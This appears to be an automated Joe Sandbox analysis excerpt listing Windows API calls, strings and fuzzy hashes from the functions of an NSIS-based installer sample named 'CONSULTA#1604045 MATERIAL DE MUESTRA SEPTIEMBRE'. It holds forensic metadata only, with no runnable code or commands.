                                                • Snapshot File: hcaresult_3_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                • String ID:
                                                • API String ID: 3449924974-0
                                                • Opcode ID: 6ae7c342d9c1b50a082fcf4789916780a4d0616efa07736c5e287c1420eecf92
                                                • Instruction ID: cbd092c4ebd5e7b47652c6b2ce971f8280a433404df7830fbb595f789125ae90
                                                • Opcode Fuzzy Hash: 6ae7c342d9c1b50a082fcf4789916780a4d0616efa07736c5e287c1420eecf92
                                                • Instruction Fuzzy Hash: 43011A72D00619DAEF10EFA0C9447EFBBB8EF04344F00803AD944B6280E7789614CF99
                                                APIs
                                                  • Part of subcall function 00406212: lstrcpynW.KERNEL32(?,?,00000400,004034F7,00429240,NSIS Error), ref: 0040621F
                                                  • Part of subcall function 00405C71: CharNextW.USER32(?,?,00425F30,?,00405CE5,00425F30,00425F30,758E3420,?,758E2EE0,00405A23,?,758E3420,758E2EE0,00000000), ref: 00405C7F
                                                  • Part of subcall function 00405C71: CharNextW.USER32(00000000), ref: 00405C84
                                                  • Part of subcall function 00405C71: CharNextW.USER32(00000000), ref: 00405C9C
                                                • lstrlenW.KERNEL32(00425F30,00000000,00425F30,00425F30,758E3420,?,758E2EE0,00405A23,?,758E3420,758E2EE0,00000000), ref: 00405D27
                                                • GetFileAttributesW.KERNEL32(00425F30,00425F30,00425F30,00425F30,00425F30,00425F30,00000000,00425F30,00425F30,758E3420,?,758E2EE0,00405A23,?,758E3420,758E2EE0), ref: 00405D37
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.7553492156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.7553454503.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553528536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553564922.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553605570.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                • String ID: 0_B
                                                • API String ID: 3248276644-2128305573
                                                • Opcode ID: 8c509004bd2409bcc8bce800ca11afa93321ed7f3e6ee2afcf27be4b7ee26805
                                                • Instruction ID: ff48dfae10af5decf38b12d619470e329e8f167eeffaec785d8039fb28d6ac4e
                                                • Opcode Fuzzy Hash: 8c509004bd2409bcc8bce800ca11afa93321ed7f3e6ee2afcf27be4b7ee26805
                                                • Instruction Fuzzy Hash: 6DF04439108F612AE622323A2D08ABF1A14CF8236474A423FF851B12D1CB3C8D43DC6E
                                                APIs
                                                • IsWindowVisible.USER32(?), ref: 00405314
                                                • CallWindowProcW.USER32(?,?,?,?), ref: 00405365
                                                  • Part of subcall function 00404322: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404334
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.7553492156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.7553454503.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553528536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553564922.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553605570.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID: Window$CallMessageProcSendVisible
                                                • String ID:
                                                • API String ID: 3748168415-3916222277
                                                • Opcode ID: 1c38682ff548693de77d02b4aeee144e7a7efb8abd51762e205331c359b10038
                                                • Instruction ID: 55ce392e6746b2cc60fd0279fd4fa9b35be9dafe7b92107a95c9794c7a372d77
                                                • Opcode Fuzzy Hash: 1c38682ff548693de77d02b4aeee144e7a7efb8abd51762e205331c359b10038
                                                • Instruction Fuzzy Hash: 8F01B1B2200708ABEF209F11DD80AAB3725EB80395F545036FE007A1D1C3BA8D929E6D
                                                APIs
                                                • GetTickCount.KERNEL32 ref: 00405E34
                                                • GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,00435000,00403448,00437000,00437800,00437800,00437800,00437800,00437800,00437800,00403672), ref: 00405E4F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.7553492156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.7553454503.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553528536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553564922.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553605570.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID: CountFileNameTempTick
                                                • String ID: nsa
                                                • API String ID: 1716503409-2209301699
                                                • Opcode ID: ba752c91d03ec01f63b9c4f62f06acfe59d2ba7d741f037e803b5e880a418ded
                                                • Instruction ID: 4cf6052b0ced346fb1ee4b1f894cf66bb827df7868a0d4c9989a51242fd2e3ec
                                                • Opcode Fuzzy Hash: ba752c91d03ec01f63b9c4f62f06acfe59d2ba7d741f037e803b5e880a418ded
                                                • Instruction Fuzzy Hash: 9BF09076700608FBDB008F59DD05A9BBBBDEB95750F10403AFD40F7180E6B09A548B64
                                                APIs
                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 0040591B
                                                • CloseHandle.KERNEL32(?), ref: 00405928
                                                Strings
                                                • Error launching installer, xrefs: 00405905
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.7553492156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.7553454503.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553528536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553564922.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553605570.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID: CloseCreateHandleProcess
                                                • String ID: Error launching installer
                                                • API String ID: 3712363035-66219284
                                                • Opcode ID: 03ab27a360793ac613c0483ba4ee8f6366951212bcf32abb356d437eb8ce57e6
                                                • Instruction ID: ac9b0bf38c37d054f1ed4f6a01e64bdbc49d0edc431f290d839f62d49592851a
                                                • Opcode Fuzzy Hash: 03ab27a360793ac613c0483ba4ee8f6366951212bcf32abb356d437eb8ce57e6
                                                • Instruction Fuzzy Hash: B0E04FF0A00209BFEB009B64ED45F7B77ACEB04208F404431BD00F2160D77498148A78
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.7553492156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.7553454503.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553528536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553564922.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553605570.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c054bf0c5d93fa0a7b6250bc48fdf5a8ef487737ec2afd77fa79e2fd840b2821
                                                • Instruction ID: ad0bcc128236992ad7a4f6733702d2b43af4dc4d223e88fe38095793509b9f66
                                                • Opcode Fuzzy Hash: c054bf0c5d93fa0a7b6250bc48fdf5a8ef487737ec2afd77fa79e2fd840b2821
                                                • Instruction Fuzzy Hash: 62A15671D04229CBDF28CFA8C854AADBBB1FF44305F14816ED856BB281C7785986CF45
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.7553492156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.7553454503.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553528536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553564922.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553605570.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e7217611772f9ef51776e54c981640a2e38891cb8cac899c938ecb9dba8bbb68
                                                • Instruction ID: 6aec0e073e41beee5660f1704474c6018554c7323141eb4488ca3ed34e09e74f
                                                • Opcode Fuzzy Hash: e7217611772f9ef51776e54c981640a2e38891cb8cac899c938ecb9dba8bbb68
                                                • Instruction Fuzzy Hash: 71913271D04229CBDF28CFA8C854BADBBB1FF44305F14816AD856BB291C7786986CF45
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.7553492156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.7553454503.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553528536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553564922.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553605570.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0898a8e2da4e1da6e9a921ed15670c8ccd525f320a25fb1a5aeeb31869c426e5
                                                • Instruction ID: 7ea7bfe366fdde138a2213b1adeace564b33d0438ed0be708c4ee64e1a3b53a1
                                                • Opcode Fuzzy Hash: 0898a8e2da4e1da6e9a921ed15670c8ccd525f320a25fb1a5aeeb31869c426e5
                                                • Instruction Fuzzy Hash: 50814531D04228DFDF24CFA8C884BADBBB1FB44305F25816AD856BB291C7789996CF45
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.7553492156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.7553454503.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553528536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553564922.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553605570.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bf476539507983e16092c80279d888edc01129ecf00556e39cf10d10f419ff7d
                                                • Instruction ID: b0390ff044984b209d4cab8587791f90ef454c2be00e5ddb87b3a87963c4087b
                                                • Opcode Fuzzy Hash: bf476539507983e16092c80279d888edc01129ecf00556e39cf10d10f419ff7d
                                                • Instruction Fuzzy Hash: 83814631D04229DBDB24CFA9C844BAEBBB1FB44305F21816AD856BB2C1C7786986DF45
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.7553492156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.7553454503.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553528536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553564922.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553605570.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 149a1ea87bad9471ec2d26afc2e1eb54ca0b669066d2141da6cfc8ccdd9a5e64
                                                • Instruction ID: b22102ba0a97a3123bbdfffdcb3b598a66073f742a3c91e931c35cfd39b2e4d0
                                                • Opcode Fuzzy Hash: 149a1ea87bad9471ec2d26afc2e1eb54ca0b669066d2141da6cfc8ccdd9a5e64
                                                • Instruction Fuzzy Hash: 2B712271D04229DBDF28CFA8C884BADBBB1FB44305F15806AD806BB291C7789996DF44
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.7553492156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.7553454503.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553528536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553564922.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553605570.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: dcb8aa4ffb3c1ace06284f4ef2cf8db0442e32867474e3534aac7ea6feec76b4
                                                • Instruction ID: 9997fd61ac043c1521ccfeb60d91edfb3447ef4cf3d9eb85cab0c4916a58cc02
                                                • Opcode Fuzzy Hash: dcb8aa4ffb3c1ace06284f4ef2cf8db0442e32867474e3534aac7ea6feec76b4
                                                • Instruction Fuzzy Hash: 5E714331D04229DBDF28CFA8C844BADBBB1FF44305F15806AD846BB290C7785996DF45
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.7553492156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.7553454503.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553528536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553564922.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553605570.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5ce5b5824dab04b0af399fdb569f5160cdf810ce4d6e1efcb4a21919472af673
                                                • Instruction ID: 57281eb70c6d5ee4f1dcb93120720bdacd8771e53a80a41a257af2ecf5b7c0f8
                                                • Opcode Fuzzy Hash: 5ce5b5824dab04b0af399fdb569f5160cdf810ce4d6e1efcb4a21919472af673
                                                • Instruction Fuzzy Hash: 7C714431D04229DBEF28CF98C844BADBBB1FF44305F11806AD856BB291C7789A96DF44
                                                APIs
                                                • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040602D,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D5C
                                                • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405D74
                                                • CharNextA.USER32(00000000,?,00000000,0040602D,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D85
                                                • lstrlenA.KERNEL32(00000000,?,00000000,0040602D,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D8E
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.7553492156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.7553454503.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553528536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553564922.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553605570.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID: lstrlen$CharNextlstrcmpi
                                                • String ID:
                                                • API String ID: 190613189-0
                                                • Opcode ID: d13a305aa79855a3845d1893bd1e44018cb4e3b8a4cc5142433a7699c001be6c
                                                • Instruction ID: 1f72a7e7db10584d46f5d47bab472a29a69204e410489cb336b3e0253d2e012c
                                                • Opcode Fuzzy Hash: d13a305aa79855a3845d1893bd1e44018cb4e3b8a4cc5142433a7699c001be6c
                                                • Instruction Fuzzy Hash: 31F09631104918FFC712DFA5DD0499FBBA8EF06350B2580BAE841F7251D674DE019F99